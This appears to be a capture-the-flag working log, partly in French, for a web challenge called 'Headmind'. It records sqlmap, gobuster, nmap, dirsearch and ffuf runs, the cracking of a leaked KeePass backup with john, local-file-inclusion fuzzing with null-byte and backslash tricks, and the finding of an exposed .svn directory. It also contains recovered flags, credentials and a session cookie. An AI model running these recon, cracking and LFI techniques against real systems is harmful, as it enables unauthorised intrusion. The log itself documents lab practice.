login.php

<!--HMP{St4rt_0f_J0urn3y}-->
<!--Have no fear ! Our keepass file in vegvisir/ protects us-->

python sqlmap.py -r headmind.txt

[13:07:22] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[13:07:22] [WARNING] HTTP error codes detected during run:
400 (Bad Request) - 147 times

gobuster dir -u https://challenge-headmind.rslab.ovh:8888 -w ../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://challenge-headmind.rslab.ovh:8888
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                ../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/content              (Status: 301) [Size: 354] [--> https://challenge-headmind.rslab.ovh:8888/content/]
/includes             (Status: 301) [Size: 355] [--> https://challenge-headmind.rslab.ovh:8888/includes/]
/api                  (Status: 301) [Size: 350] [--> https://challenge-headmind.rslab.ovh:8888/api/]
/config               (Status: 301) [Size: 353] [--> https://challenge-headmind.rslab.ovh:8888/config/]
/requests             (Status: 301) [Size: 355] [--> https://challenge-headmind.rslab.ovh:8888/requests/]
/access_control       (Status: 301) [Size: 361] [--> https://challenge-headmind.rslab.ovh:8888/access_control/]
Progress: 81643 / 81644 (100.00%)
===============================================================
Finished
===============================================================

nmap -sV --top-ports 1000 51.91.103.116
Starting Nmap 7.95 ( https://nmap.org ) at 2024-11-15 13:12 CET
Nmap scan report for vps-b9a14215.vps.ovh.net (51.91.103.116)
Host is up (0.030s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
80/tcp   open  http     Apache httpd 2.4.62 ((Debian))
443/tcp  open  ssl/http Apache httpd 2.4.62 ((Debian))
3306/tcp open  mysql    MySQL 8.0.40
3690 SVN
8081/tcp open  http     Apache httpd 2.4.62 ((Debian))
8888/tcp open  http     Apache httpd 2.4.62
Service Info: Host: challenge-headmind.rslab.ovh; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.42 seconds

dirsearch -u https://challenge-headmind.rslab.ovh:8888/vegvisir -r -e kdbx

[13:37:07] Starting: vegvisir/
[13:37:09] 403 -  295B  - /vegvisir/.ht_wsr.txt
[13:37:09] 403 -  295B  - /vegvisir/.htaccess.bak1
[13:37:09] 403 -  295B  - /vegvisir/.htaccess.orig
[13:37:09] 403 -  295B  - /vegvisir/.htaccess.sample
[13:37:09] 403 -  295B  - /vegvisir/.htaccess.save
[13:37:09] 403 -  295B  - /vegvisir/.htaccess_extra
[13:37:09] 403 -  295B  - /vegvisir/.htaccessBAK
[13:37:09] 403 -  295B  - /vegvisir/.htaccess_orig
[13:37:09] 403 -  295B  - /vegvisir/.htaccess_sc
[13:37:09] 403 -  295B  - /vegvisir/.htaccessOLD
[13:37:09] 403 -  295B  - /vegvisir/.htaccessOLD2
[13:37:09] 403 -  295B  - /vegvisir/.htm
[13:37:09] 403 -  295B  - /vegvisir/.html
[13:37:09] 403 -  295B  - /vegvisir/.htpasswd_test
[13:37:09] 403 -  295B  - /vegvisir/.htpasswds
[13:37:09] 403 -  295B  - /vegvisir/.httr-oauth

We have a kdbx file which is a keepass database backup file. And we need a password to open it.

I found a tool which creates a johntheripper like file to brute force the database password.


python keepass2john.py ../../CTFs-WriteUps/Headmind/backup.kdbx > hash.txt
john --format=keepass hash.txt 

We find the password: ragnarok

When opening the database with KeePassXC we find a combination username:password

Floki:HMP{Trust_Y0ur_N4v1g4t0r}

These credentials work

LFI dans la page 2FA un dossier useless existe, on peut essayer de bruteforce les fichiers dedans.

Toutes nos tentatives de mettre des / %2f etc sont vaines, cependant \ marche. On ne sait pas si c'est interprété.

useless\test.php

On va pouvoir fuzz useless\FUZZ

ffuf -u "https://challenge-headmind.rslab.ovh:8888/confirmcode.php?method=useless/FUZZ%00" -w Outils/SecLists/Discovery/Web-Content/big.txt -H "Cookie: PHPSESSID=nu32q6tmcf3q8m2dcb6gmaijch" -fr "Failed opening" -e .php,.html,.txt


        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : https://challenge-headmind.rslab.ovh:8888/confirmcode.php?method=useless/FUZZ%00
 :: Wordlist         : FUZZ: /home/hugocls/Bureau/Programmation/CTFs/Outils/SecLists/Discovery/Web-Content/big.txt
 :: Header           : Cookie: PHPSESSID=nu32q6tmcf3q8m2dcb6gmaijch
 :: Extensions       : .php .html .txt 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Regexp: Failed opening
________________________________________________

:: Progress: [81904/81904] :: Job [1/1] :: 327 req/sec :: Duration: [0:03:06] :: Errors: 0 ::

Same with \
Same with \ without %00

ffuf -u "https://challenge-headmind.rslab.ovh:8888/confirmcode.php?method=FUZZ" -w Outils/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -H "Cookie: PHPSESSID=nu32q6tmcf3q8m2dcb6gmaijch" -mr "Success" 

svn
useless


Même si le dossier /includes/svn est marqué en not found, peut être que certains fichiers sont accessibles, c'est ce qu'on va essayer de voir:

dirsearch -u https://challenge-headmind.rslab.ovh:8888/includes/svn/ -r -e php,html,txt
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, html, txt | HTTP method: GET | Threads: 25 | Wordlist size: 10403

Output File: /home/hugocls/Bureau/Programmation/CTFs/reports/https_challenge-headmind.rslab.ovh_8888/_includes_svn__24-11-17_12-09-28.txt

Target: https://challenge-headmind.rslab.ovh:8888/

[12:09:28] Starting: includes/svn/
[12:09:30] 403 -  295B  - /includes/svn/.ht_wsr.txt
[12:09:30] 403 -  295B  - /includes/svn/.htaccess.bak1
[12:09:30] 403 -  295B  - /includes/svn/.htaccess.sample
[12:09:30] 403 -  295B  - /includes/svn/.htaccess.orig
[12:09:30] 403 -  295B  - /includes/svn/.htaccess.save
[12:09:30] 403 -  295B  - /includes/svn/.htaccess_sc
[12:09:30] 403 -  295B  - /includes/svn/.htaccess_orig
[12:09:30] 403 -  295B  - /includes/svn/.htaccess_extra
[12:09:30] 403 -  295B  - /includes/svn/.htaccessBAK
[12:09:30] 403 -  295B  - /includes/svn/.htaccessOLD
[12:09:30] 403 -  295B  - /includes/svn/.htaccessOLD2
[12:09:30] 403 -  295B  - /includes/svn/.html
[12:09:30] 403 -  295B  - /includes/svn/.htm
[12:09:30] 403 -  295B  - /includes/svn/.htpasswd_test
[12:09:30] 403 -  295B  - /includes/svn/.htpasswds
[12:09:30] 403 -  295B  - /includes/svn/.httr-oauth
[12:09:31] 301 -  364B  - /includes/svn/.svn  ->  https://challenge-headmind.rslab.ovh:8888/includes/svn/.svn/
[12:09:31] 200 -    3B  - /includes/svn/.svn/entries
[12:09:31] 200 -  560B  - /includes/svn/.svn/
Added to the queue: includes/svn/.svn/
[12:09:33] 200 -  120KB - /includes/svn/.svn/wc.db

[12:10:03] Starting: includes/svn/.svn/
[12:10:05] 403 -  295B  - /includes/svn/.svn/.ht_wsr.txt
[12:10:05] 403 -  295B  - /includes/svn/.svn/.htaccess.bak1
[12:10:05] 403 -  295B  - /includes/svn/.svn/.htaccess.sample
[12:10:05] 403 -  295B  - /includes/svn/.svn/.htaccess.save
[12:10:05] 403 -  295B  - /includes/svn/.svn/.htaccess_extra
[12:10:05] 403 -  295B  - /includes/svn/.svn/.htaccessBAK
[12:10:05] 403 -  295B  - /includes/svn/.svn/.htaccess.orig
[12:10:05] 403 -  295B  - /includes/svn/.svn/.htaccessOLD
[12:10:05] 403 -  295B  - /includes/svn/.svn/.htaccess_sc
[12:10:05] 403 -  295B  - /includes/svn/.svn/.htaccessOLD2
[12:10:05] 403 -  295B  - /includes/svn/.svn/.htaccess_orig
[12:10:05] 403 -  295B  - /includes/svn/.svn/.htm
[12:10:05] 403 -  295B  - /includes/svn/.svn/.html
[12:10:05] 403 -  295B  - /includes/svn/.svn/.htpasswd_test
[12:10:05] 403 -  295B  - /includes/svn/.svn/.htpasswds
[12:10:05] 403 -  295B  - /includes/svn/.svn/.httr-oauth
[12:10:32] 301 -  368B  - /includes/svn/.svn/tmp  ->  https://challenge-headmind.rslab.ovh:8888/includes/svn/.svn/tmp/
[12:10:32] 200 -  425B  - /includes/svn/.svn/tmp/
Added to the queue: includes/svn/.svn/tmp/

[12:10:36] Starting: includes/svn/.svn/tmp/
[12:10:37] 403 -  295B  - /includes/svn/.svn/tmp/.ht_wsr.txt
[12:10:37] 403 -  295B  - /includes/svn/.svn/tmp/.htaccess.bak1
[12:10:37] 403 -  295B  - /includes/svn/.svn/tmp/.htaccess.sample
[12:10:37] 403 -  295B  - /includes/svn/.svn/tmp/.htaccess.orig
[12:10:37] 403 -  295B  - /includes/svn/.svn/tmp/.htaccess_extra
[12:10:37] 403 -  295B  - /includes/svn/.svn/tmp/.htaccess_orig
[12:10:37] 403 -  295B  - /includes/svn/.svn/tmp/.htaccess.save
[12:10:37] 403 -  295B  - /includes/svn/.svn/tmp/.htaccess_sc
[12:10:37] 403 -  295B  - /includes/svn/.svn/tmp/.htaccessBAK
[12:10:37] 403 -  295B  - /includes/svn/.svn/tmp/.htaccessOLD
[12:10:37] 403 -  295B  - /includes/svn/.svn/tmp/.htaccessOLD2
[12:10:37] 403 -  295B  - /includes/svn/.svn/tmp/.htm
[12:10:37] 403 -  295B  - /includes/svn/.svn/tmp/.httr-oauth
[12:10:37] 403 -  295B  - /includes/svn/.svn/tmp/.html
[12:10:37] 403 -  295B  - /includes/svn/.svn/tmp/.htpasswd_test
[12:10:37] 403 -  295B  - /includes/svn/.svn/tmp/.htpasswds
CTRL+C detected: Pausing threads, please wait...
[q]uit / [c]ontinue: 

On arrête ici car ça ne sert plus à rien.